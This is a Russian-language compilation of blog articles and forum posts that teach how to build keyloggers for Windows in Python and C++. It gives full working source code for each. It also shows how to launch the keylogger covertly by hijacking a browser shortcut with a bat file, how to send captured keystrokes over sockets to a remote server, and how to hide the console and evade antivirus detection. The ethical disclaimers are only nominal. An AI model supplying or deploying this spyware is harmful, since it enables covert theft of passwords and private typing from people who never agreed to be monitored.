Пишем простой keylogger для windows на c.              Лаборатория информационной безопасности. Что такое и зачем нужны кейлоггеры

Здравствуйте, с вами снова QUAZAR. Сегодня я покажу как создать простой кейлоггер на Python. Разумеется данный клавиатурный шпион не может соперничать с такими гигантами как , но несмотря на это ему можно найти свое применение.

Что такое кейлоггер?

Подробно о том, что такое кейлоггер и о видах кейлоггеров, вы можете прочитать в статье « «. Чтобы найти дополнительные материалы по теме используйте поиск по сайту, который находится в верхнем правом углу. Просто впишите слово «кейлоггер» или «клавиатурный шпион».

Простой кейлоггер на Python

Для создания кейлоггера нам потребуется:

  • Операционная система: Windows или MacOs (также можно использовать любой Linux, но я лично не пробовал)
  • Установленный на целевой машине Python, а также специальные библиотеки.

Данный материал носит информационный характер. Изложенная в статье информация предоставлена исключительно в ознакомительных целях. Ни редакция сайта www.сайт, ни автор публикации не несут никакой ответственности за любой вред нанесенный материалом этой статьи.

Создание простого кейлоггера на Python

Для начала необходимо скачать и установить Python .


Простой кейлоггер на Python

После установки Python вам необходимо установить модули «pyHook» и «pywin32». На этом сайте вы найдете 32- и 64-битные версии для Windows и других ОС. Скачайте «PYhook» и «pyWin32» в соответствии с установленной вами версией Python и Windows (32 бит или 64 бит).


Кейлоггер на Python. Модуль PYhook Кейлоггер на Python. Модуль pyWin32

После загрузки установите и откройте меню IDLE (Python GUI) из меню «Пуск».

Простой кейлоггер на Python

Зайдите в меню «Файл» и нажмите на пункте «Новый Файл». После чего вставьте код кейлоггера:

#Name: QUAZAR
#Website: www.сайт
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

И сохраните его назвав файл Keylogger.pyw. Только не сохраняйте файл в корневом каталоге C: где для копирования и удаления файлов нужны права администратора. Создайте новую папку на диске C: или в другом месте, где вам не нужны права администратора для копирования файлов и сохраните Keylogger.pyw там.

В качестве выходного файла отчета «file_log =« C:keyloggerlog.txt » вы можете выбрать любое место, но лучше конечно, какое-то скрытое место на жестком диске. В этом примере я буду сохранять файл отчета на диск в корневой каталог C:. Ведь мне нечего скрывать.

Автоматический запуск кейлоггера на Python

Кейлоггер готов. Теперь надо сделать так чтобы кейлоггер запускался скрыто от пользователя и автоматически с загрузкой Windows. Реализовать это можно по разному. Попробуем сделать с помощью bat-файла привязав запуск кейлоггера к какой-нибудь программе или прописав в автозагрузку.

Для начала создайте bat-файл. Скопируйте и вставьте в блокнот следующий код:

::Name: QUAZAR
::Website: www.сайт
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

В первой строке необходимо вписать путь к файлу keylogger.pyw (в моем случае «C:keylogger.pyw»). Во второй строке вы должны ввести путь к программе, который обычно использует пользователь (в моем случае — браузер Opera).

После редактирования сохраните файл в расширении.bat (в моем случае logger.bat) в каком-нибудь скрытом месте на компьютере (в моем случае в «C:keylogger.bat»).

Теперь идем на рабочий стол и выбираем ярлык часто используемой программы (в моем случае — это браузер Opera). Правым кликом мышки вызываем контекстное меню и заходим в свойства ярлыка. В поле «Объект» вводим путь к бат-файлу кейлоггера «C:keyloggerlogger.bat».

После внесения изменений изменится и иконка ярлыка. Но это легко решается на вкладке свойстве (смотрите скрин выше).


А прежде чем приступить к прочтению - загляни в мой бложик, там я публикую свои авторские статьи по программированию, вирусологии и прочим интересным вещам
Оригинал статьи -

Вся информация предоставлена исключительно в ознакомительных целях. Ни администрация, ни автор не несут ответственности за любой возможный вред, причиненный материалами данной статьи.


Предисловие
На протяжении, примерно, месяца я постоянно наблюдал за различными просьбами, вопросами насчет кейлоггеров. Многие искали, но не могли найти исходники, многие искали, но не могли найти продажники и т.д.

В этой статье я хочу показать, насколько просто написать самому кейлоггер с базовым функционалом. Базу я позаимствовал отсюда - * * , пофиксил баги и доработал под взаимодействие с WinSocket.

Материалы
  • Visual Studio 2015 Community Update 4
  • Visual C++ 2015
Структура приложения
Для начала необходимо определить, как вообще будет работать кейлоггер. Будь то отсылка логов на FTP/Почту, запись нажатий в сокет, отправка файла на гейт, запись логов в бд.
Я решил остановится на сокетах. Почему? Это удобно, просто и юзабельно.
Исходя из выбора, нам нужно будет сделать 2 приложения:

Сервер
  • Консольное приложение, которое будет принимать данные от клиента и выдавать в консоли
Клиент
  • Собственно, сам кейлоггер, который будет отсылать нажатия клавиш на сервер
И начнем мы, пожалуй, с сервера.

Сервер
Создаем консольное C++ приложение в Visual Studio.
Весь код есть в оф. примере MSDN - *Войдите на форум для просмотра ссылок. *
Нам лишь нужно заменить некоторые значения в нем...
Сразу пропишем константные переменные: величину буффера и порт сервера, на который будут приходить логи

Код:

#define DEFAULT_BUFLEN 1024 //Буффер #define DEFAULT_PORT "1337" //Порт

Вместо единоразового do/while ставим бесконечный цикл, в котором будем принимать данные от клиента, выводить их в консоль, закрывать соединение и по новой:

Код:

Do { ClientSocket = accept(ListenSocket, NULL, NULL); //Принимаем коннект iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);//Считываем лог if (iResult > 0) //Если лог не пустой printf("%s", recvbuf); //Выводим closesocket(ClientSocket);//Закрываем соединение memset(recvbuf, 0, sizeof recvbuf);//Освобождаем память } while (true);

Компилируем в Release, закидываем на дедик, открываем нужный нам порт и запускаем

Клиент


Создаем приложение Win32 в Visual Studio.
Как я уже и говорил выше, хук клавиатуры и обработчик нажатий я взял с *Войдите на форум для просмотра ссылок. *
Чтоб прикрутить отправку нажатия на сокет я обратился к *Войдите на форум для просмотра ссылок. *
Так же, сразу определяем константные переменные: длину буффера, айпи дедика/компа и порт

Код:

#define DEFAULT_BUFLEN 20000 #define SERVER_IP "127.0.0.1" #define SERVER_PORT "1337"

Некоторые переменные пришлось вытащить из их методов и сделать глобальными, чтобы код начал работать корректно:

Код:

WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; HHOOK _hook;KBDLLHOOKSTRUCT kbdStruct; char lastwindow; int Save(int key_stroke);// Убрал второй аргумент

Создаем метод отправки данных на сервер по примеру, который был в начале абзаца. Далее, везде заменяем порт, айпи и передаваемую инфу на аргументы функции:

Код:

Void sendData(char *ip, char * port, char*data)

В методе Save делаем следующее - убираем второй аргумент и меняем запись логов в файл на отправку к серверу:

Код:

Char data; sprintf(data, "\n\n\n", window_title, s); sendData(SERVER_IP, SERVER_PORT, data);

Далее, по такому же принципу, меняем отправку в нажатиях служебных клавиш. Отправку букв можно сделать таким образом:

Код:

Char c; sprintf(c, "%c", key_stroke); sendData(SERVER_IP, SERVER_PORT, c);

Вырезаем все что связано с видимостью окна из кода, и, готово.

Итог
При запуске кейлоггера, он повиснет в процессах и будет обрабатывать каждое нажатие на клавиатуре. Возможно, некоторые символы будут отображаться некорректно, например, слеши, но все это можно исправить самому (ведь если бы все было идеально, ко мне в личку стучал Иисус с просьбой проверить продажник приватного кейлоггера).

Здравствуйте, Хабровчане.

Решил написать программный логгер клавиатуры на C++ с использованием WinAPI. Не могу сказать, что преследовал какую-нибудь шпионскую цель, когда писал его, скорее знакомился с хуками на WinAPI. Так как получилось не так уж и плохо, а на Хабре нет статьи про программные логгеры, решил написать свою.

Как это сделано?

Для отлавливания нажатия клавиш был использован клавиатурный хук .

HHOOK WINAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);

Для того, чтобы перехватывать нажатия всех клавиатурных клавиш, в качестве параметра idHook удобно указать WH_KEYBOARD или WH_KEYBOARD_LL. Разница лишь в том, что WH_KEYBOARD_LL также перехватывает нажатия системных клавиш (т.е Alt или любая клавиша при зажатом Alt), поэтому его мы и выберем.

Lpfn — указатель на функцию, обрабатывающую перехваченные сообщения (в нашем случае нажатия клавиш).
hMod — дескриптор экземпляра приложения, содержащий обрабатывающую функцию.
dwThreadId — идентификатор потока, сообщения которого мы хотим перехватывать. Нужно установить данный параметр в 0, чтобы перехватывать сообщения всех потоков.

Возвращаемое значение — дескриптор нашего хука, который при выходе нужно будет освободить функцией UnhookWindowsHookEx.
Обратившись за справкой в MSDN , мы видим прототип функции, обрабатывающей сообщения данного хука.

LRESULT CALLBACK LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);

Параметр nCode должен быть равен HC_ACTION, иначе сообщение предоставляется другому процессу.
wParam — это одно из следующих значений WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, или WM_SYSKEYUP.
lParam — указатель на структуру KBDLLHOOKSTRUCT, в полях которой нас интересуют только 2 параметра: vkCode(виртуальный код) и scanCode нажатой клавиши.
Данная функция должна вернуть значение функции CallNextHookEx, в противном же случае, следующий обрабатывающий событие хук, может получить неверные параметры сообщения.
Каждый раз при нажатии клавиши, наша программа будет перехватывать это событие и обрабатывать нашей процедурой LowLevelKeyboardProc.

Для того, чтобы ретранслировать виртуальный и скан код клавиши в символьный вид, нам понадобится функция ToAsciiEx .

Int WINAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL dwhkl);

Первые 2 параметра — виртуальный и скан коды клавиши соответственно.
lpKeyState — состояние клавиатуры, проверяет какие клавиши нажаты/активны.
lpChar — указатель на двойное слово, в которое функция запишет символьное представление клавиши.
uFlags — параметр, указывающий на активность меню.
dwhkl — идентификатор раскладки клавиатуры.
Возвращаемое значение — количество символов, записанных в буфер lpChar. Нас интересует случай, когда записан 1 символ.
В принципе, это 3 основные функции, требуемые для самого простого клавиатурного логгера.

Немного о программе

Программа компилируется без RTL в Visual Studio 2013. Таким образом, мы получаем небольшой объём исполняемого файла и невозможность сборки в debug-версии. Данные записываются в лог файл в тот же каталог, где находится.exe файл. Для удобства логгер каждый раз создает новый файл при записи, записывает время нажатия клавиш, имя окна, в котором вводились символы и останавливается по нажатию LSHIFT+RSHIFT. Данный сниффер не адаптирован под полную клавиатуру, некоторые служебные клавиши, например F13 или NUM_LOCK, могут писаться, как . Думаю те, кто хоть немного знаком с C/C++ смогут запросто их добавить. Более того, Вы можете полностью изменить код так, как Вам удобно.

Привет всем!

Идея написания кейлоггера у меня появилась давно, в начале я писал на ассемблере, но не доделал до конца, получилось что он очень глючил, но т.к. работы было много, а комерсом я не занимаюсь, стимул быстро пропал...

Шло время, я про эту тематику как-то забил, пока мне не попалась на глаза статья, атаки на банковскую систему, при помощи простенького кейлогера и вполне легальной программы, вероятно для пересылки логов и обхода файерволов...

Мне стало интересно, а как сложно "Программисту средней руки", к коим я себя отношу написать простенький кейлогер, как он будет палится аверами и сколько времени на это потребуется!

Идея создания такой темы/раздела появилась уже потом, когда я почти закончил этот кейлоггер.

Но обо всём попарядку, итак ответы на вопросы моего мини-исследования:

1. На момент написания статьи кейлоггер обнаруживает какой-то Endgame, и-то если поиграть с Relise/Debug и настройками компилирования, детекты пропадают;

2. Кейлогер отлично работает с UAC, практически не палит себя, т.е. вы никак не поймёте, что ваши клавиши пишутся в лог.

3. Антивирусы никак не реагируют, т.е. считают что так и надо.

4.Сколько-же время на это ушло?

Около 5-ти часов, но это нужно учитывать, что опыта работы в студии у меня нет, пришлось разбираться с кодировкой символов, хуками и т.д. Больше гемора с кодировкой конечно было...

Итак перейдём к основной части этой статьи:

1.Постановка задачи:

Написать кейлоггер локального действия, который может отслеживать нажатия клавиш и записывать их в лог, также нужно в логе указать дату нажатия и окно приложения где было нажата клавиша, кейлогер должен работать с русской и английской раскладкой. Также кейлогер должен работать с ограниченными правами в системе и никак не выдавать себя, пример лога:

Безымянный - Блокнот: English: M: Fri May 12 20:38:39 2017
Безымянный - Блокнот: English: ,: Fri May 12 20:38:41 2017

Безымянный - Блокнот: Russian: : : Fri May 12 20:38:48 2017
Безымянный - Блокнот: Russian: : Р: Fri May 12 20:38:48 2017
Безымянный - Блокнот: Russian: : И: Fri May 12 20:38:48 2017
Безымянный - Блокнот: Russian: : е: Fri May 12 20:38:50 2017

2.Основная идея написания таких программ:

Не важно на чём вы хотите писать, основная идея, это поставить hook, если по простому, то это "ловушка" для клавиатуры, смысл в том-что при нажатии пользователем на клавишу, ваша программа будет выполнять вашу функцию (подпрограмму), где вы можете уже определить нажатую клавишу, записать её в лог и т.д.

В виндовсе есть SetWindowsHookEx , которая устанавливает определяемую программой процедуру фильтра (hook) в цепочку фильтров (hook). Вы должны установить процедуру фильтра (hook) для того, чтобы контролировать в системе определенного рода типы событий. Эти события связаны или с конкретным потоком или со всеми потоками одного и того же рабочего стола, что и вызывающий поток.

Обратите внимание на последнее предложения, благодаря этого свойства, мы можем отследить все нажатия клавиш, в других приложений.

Как это сделать, пример:

Int main(int argc, _TCHAR* argv) { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); msgLoop(); return 0; }

HookProc - Это наша подпрограмма (Которая будет вызываться после нажатия пользователем на клавишу), которую мы позже напишем.

MsgLoop() - Тоже очень важная вещь, там цикл, если по простому то программа зациклица и будет постоянно вызывать hookProc когда пользователь нажмёт на клавишу, вот её код:

Void msgLoop() { while (GetMessage(&message, NULL, 0, 0)) { TranslateMessage(&message); DispatchMessage(&message); } }

Функция GetMessage извлекает сообщение из очереди сообщений вызывающего потока и помещает его в заданную структуру. Эта функция регулирует поступление отправленных сообщений до тех пор, пока помещенное в очередь сообщение доступно для извлечения.

Функция TranslateMessage переводит сообщения виртуальных клавиш в символьные сообщения.

Функция DispatchMessage распределяет сообщение оконной процедуре. Она используется, чтобы доставить сообщение, извлеченное функцией GetMessage .

Теперь приступим к написанию нашей основной функции (подпрограммы), которая вызовится, после нажатия на кнопку пользователем:

Спойлер: hookProc (Код на С++)

LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam) { if (wParam == WM_KEYDOWN) { HKL Lang_Keyboard; GetActiveKb (Lang_Keyboard); //Получение текущей раскладки. int CodeKeyboard = (int) Lang_Keyboard; p = (PKBDLLHOOKSTRUCT)(lParam); sc = MapVirtualKey(p->vkCode, 0); sc <<= 16; if (!(p->vkCode <= 32)) { sc |= 0x1 << 24; } GetKeyNameTextA(sc, keyNameBuff, 16); myKey = keyNameBuff; if (myKey == "Space") { writeToLog(""); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } else { if (CodeKeyboard == 0x4190419) { //Русская раскладка //************************************************************************************************* if (isCaps() == 1) { myKey = GetSymbolRu (myKey); writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); myKey = GetSymbolRu (myKey); writeToLog(myKey); } //************************************************************************************************* } else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } } return CallNextHookEx(NULL, nCode, wParam, lParam); }


Расскажу идею, саму программу можете посмотреть во вложении:

1.Начнём с прототипа нашей подпрограммы:

LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)

WParam - Определяет нажата-ли клавиша, поэтому перед тем как что-то делать, мы проверяем нажата-ли клавиша так:

2.1. Получить раскладку клавиатуры;
2.2. Получить виртуальный код клавиатуры, по нему мы сможем уже определить что конкретно нажал пользователь;
2.3. Ну в общем получить наш символ.

Всё выше названное делает этот код:

HKL Lang_Keyboard; GetActiveKb (Lang_Keyboard); //Получение текущей раскладки. int CodeKeyboard = (int) Lang_Keyboard; p = (PKBDLLHOOKSTRUCT)(lParam); sc = MapVirtualKey(p->vkCode, 0); sc <<= 16; if (!(p->vkCode <= 32)) { sc |= 0x1 << 24; } GetKeyNameTextA(sc, keyNameBuff, 16);

GetKeyNameTextA - Поместит название клавиши в буфер keyNameBuff.

Имя программы, с которой работает пользователь, можно получить так:

GetWindowTextA(hwnd, title, 100); GetWindowTextA(hwnd, ntitle, 100); ///pars

Время так:

// Gettime time_t seconds = time(NULL); tm* timeinfo = localtime(&seconds);

Ofstream log(logName, ios::app); log << title; log << ": English"; log << ": " << s; log << ": " << asctime(timeinfo) << endl;

logName - Путь куда будет писаться файл логов, я использую стандартный вывод в поток ofstream, писаться может например в AppData (Туда и пишет), получить путь примерно так:

Strcpy(logName, getenv("APPDATA")); // Get APPDATA folder strcat(logName, "log.log");

НО ЭТО ЕЩЁ НЕ ВСЁ, ТЕПЕРЬ САМОЕ ИНТЕРЕСНОЕ, А ИМЕННО GetKeyNameTextA - РАБОТАЕТ ТОЛЬКО С СИМВОЛАМИ ЛАТИНСКОЙ РАСКЛАДКИ, КАК-ЖЕ СДЕЛАТЬ ПОДДЕРЖКУ КИРИЛИЦЫ?

Можно сделать следующий костыль, просто сопоставить кирилицу и латиницу, примерно так:

String _eng = "1234567890~!@#$%^&qwertyuiopasdfghjkl;"zxcvbnm,./QWERTYUIOPASDFGHJKL:\"|ZXCVBNM<>?"; char _rus = "1234567890ё!\"№;%:?йцукенгшщзхъфывапролджэячсмитьбю.ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭ/ЯЧСМИТЬБЮ,";

Номер символа строки _eng соответствует номеру символа _rus, следовательно если мы найдём номер символа _eng, то определим и _rus, тем самым у нас будет кирилица, как это реализовать на примере:

String GetSymbolRu (string Key) { int Number = 0; string Rezult; Number = _eng.find(Key); if (Number != -1) { char * tmp = new char ; // инициализируем дополнительный массив CharToOemA(_rus88, tmp); // преобразовываем delete tmp; // удаляем дополнительный массив Rezult = Rezult + _rus88; return Rezult; // Присвоили результат } else { return Key; } }

Итак, находим номер в _eng (Number = _eng.find(Key);), далее по этому номеру уже можем получить символ в кирилице...:)

НО ПАРА МОМЕНТОВ:

Си в принципе не дружит с кирилицей, а Visual Studio особенно, поэтому что-бы всё было чётенько, ещё один кастыльчик от меня:

Char * tmp = new char ; // инициализируем дополнительный массив CharToOemA(_rus88, tmp); // преобразовываем delete tmp; // удаляем дополнительный массив

Преобразовываем строку с кирилицей, для этого выделяем буфер в памяти и юзаем CharToOemA(_rus88, tmp);, всё теперь наша строка будет нормально писаться в файл и выводится на консоль, не забывайте удалить из памяти delete tmp; потом...:)

If (CodeKeyboard == 0x4190419) { //Russia log << title; log << ": Russian"; log << ": " << ReplaceResult(s); log << ":^^^ " << s; log << ": " << asctime(timeinfo) << endl; } else if (CodeKeyboard == 0x4090409) { //Eng log << title; log << ": English"; log << ": " << s; log << ": " << asctime(timeinfo) << endl; }

Ну нужно конечно ещё будет определить доп. клавиши, такие как пробел, ентер и т.д., примерно так:

If (myKey == "Space") { writeToLog(""); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog("");

Вроде всё основное, исходник есть во вложении, должно-быть понятно думаю...:)

Ах-да чуть не забыл:

1. Запуск налюбом компе в Visual Studio 2010 (Увеличит размер бинарника, но лучше сделать):

(Проэкт) -> (Свойства) -> (Свойства конфигурации) -> (С/С++) -> (Создание Кода) -> (Библиотека временного выполнения) -> (Многопоточная /МТ) и далее "ОК";

(Project) -> (Properties) -> (C/C++) -> (Code Generation) -> (Runtime Library) -> (Multi-threaded(/MT)) -> Ok

2. Я использовал консольный проект, так легче дебажить, поэтому ещё:

Как убрать консоль:

Жмем Project => Properties (или Alt+F7 ).

Затем Linker => Advanced и вбиваем в Entery Point следующее: mainCRTStartup .

Просто голые сорцы (Там их два), для копипасты и анализа.

ЕЩЁ ПАРА ВОПРОСОВ ПО КЕЙЛОГЕРУ:

1)Нужно-ли его развивать, сейчас там вот-что:

Поддержка латиницы/кирилицы, но не всех символов, если решу развивать, это поправлю;

В логи пишется небольшой мусор (Не нужно учитывать клавиши, которые помечены символом "/"), это можно убрать.

Можно добавить поддержку скриншётера.

2) В общем отпишитесь, нужно-ли развивать далее это, кстати Relise залили на VT, но это не страшно и специально, можно потом продолжить по обходу детекта поработать и как и через колько будет-ли детект у других.

УБЕДИТЕЛЬНАЯ ПРОСЬБА, ЕСЛИ ВОЗМОЖНО ОТПИШИТЕСЬ, ЕСЛИ СМЫСЛ ДАЛЬШЕ СОЗДАВАТЬ ПОДОБНЫЕ ТЕМЫ И РАЗВИВАТЬ ПОДОБНЫЕ ПРОДУКТЫ ТУТ! :)

Опубликовано 18 Январь 2015 . Где ?". Не нужно искать легких путей, тем более в Интернете:). Скачать кейлоггер бесплатно можно, но приготовтесь к различным ограничениям или неожиданностям. Во-первых, функциональность кейлоггера будет низкой. Бесплатные демо-версии полноценных программ обычно содержат ограничения, иногда неожиданные:). Во-вторых, не будет дополнительных, обычно сопутствующих кейлоггерам дополнительных программ или функций обработки лога, настройки слежения и т.д. В третьих, вы не обнаружите поддержки кейлоггера со стороны производителей. Вместо того, чтобы искать где скачать кейлоггер бесплатно , подумайте, а не написать ли его самостоятельно? Простейший кейлоггер для Windows написать не очень сложно, если Вы обладаете основами программирования в Windows. Итак, продолжаем выкладывать исходники кейлоггеров. Кейлоггер для Windows написан на С++, естественно с применением Win API. Хук клавиш реализован с помощью SetWindowsHookEx (WH_KEYBOARD_LL ,...). Создается исполняемый файл без библиотека dll, так сказать, кейлоггер одним файлом! Плюсы очевидны - более просто организовать удаленную установку, более маленький размер, большая скрытность (dll-ка не будет в процессах всех приложений висеть). Недостаток этого способа перехвата в его нестабильной работе, либо вообще отказа работать в Windows 7. Перехват клавиш без использования dll (WH_KEYBOARD_LL) вызывает у семерки непонимание. Приходится шаманить, колдовать, чтобы заставить кейлоггер работать. Выход конечно же всегда найдется (его ищите самостоятельно, и да пребудет с вами сила:)). Написать нормальный можно и с использованием SetWindowsHookEx (WH_KEYBOARD_LL ,...). В Windows 7 будет все нормально. Как будет работать WH_KEYBOARD_LL в Windows 8, пока не известно.

Запись в лог организована через файловый поток. Добавлено кое-что для улучшения читабельности лога. Код маленький и эффективный. Подойдет для кейлоггера для windowsс определенными добавками и вопрос, где можно скачать кейлоггер бесплатно отпадает .

Исходник файла *.exe:

#include < windows.h > #include < fstream > #include < iostream > #include < algorithm > #include < string > using namespace std; string myKey; BOOL isCaps(); char logName = "keys.txt";//LOG FILE name //init all varibles for speed MSG message; HHOOK keyboardHook; char keyNameBuff; PKBDLLHOOKSTRUCT p; unsigned int sc; //кейлоггер для Windows void writeToLog(string s) //write a string to the log { ofstream log(logName, ios::app); //opens log file log << s; //writes to log.. with format "[""]" log.close(); //closes log } // Кейлоггер для Windows BOOL isCaps() { if ((GetKeyState(VK_CAPITAL) & 0x0001)!=0 || ((GetKeyState(VK_SHIFT) & 0x8000)!=0)) { return 1; } else { return 0; } } // Кейлоггер для Windows LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)//proc to be run on hooked key { if (wParam == WM_KEYDOWN)//if key event type is key down { //get the keyname from lParam p = (PKBDLLHOOKSTRUCT) (lParam);//used to get the vkCode sc = MapVirtualKey(p->vkCode, 0); sc <<= 16; //shift 16 bits if (!(p->vkCode <= 32))//if not ascii { sc |= 0x1 << 24; // <- extended bit } GetKeyNameTextA(sc,keyNameBuff,16); // Кейлоггер для Windows - исходник //gets ASCII key name from sc into keyNameBuff //write keyname to log myKey = keyNameBuff; if (myKey == "Space") { writeToLog(" "); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } // if its none of the special keys else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } return CallNextHookEx(NULL, nCode, wParam, lParam); } // Кейлоггер для Windows void msgLoop() { while (GetMessage(&message,NULL,0,0)) { TranslateMessage(&message); DispatchMessage(&message); } } // Кейлоггер для Windows int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); //hooks keyboard msgLoop(); //stops from closing // Кейлоггер для Windows - исходник UnhookWindowsHookEx(keyboardHook); //unhooks return 0; //Never run }

Можно использовать среду разработки любую, которая вам нравится (Dev-C++, MSVS, Borland С++). Собираем, вносим необходимые индивидуальные изменения и кейлоггер для Windows готов и тратить время на поиск, где же можно скачать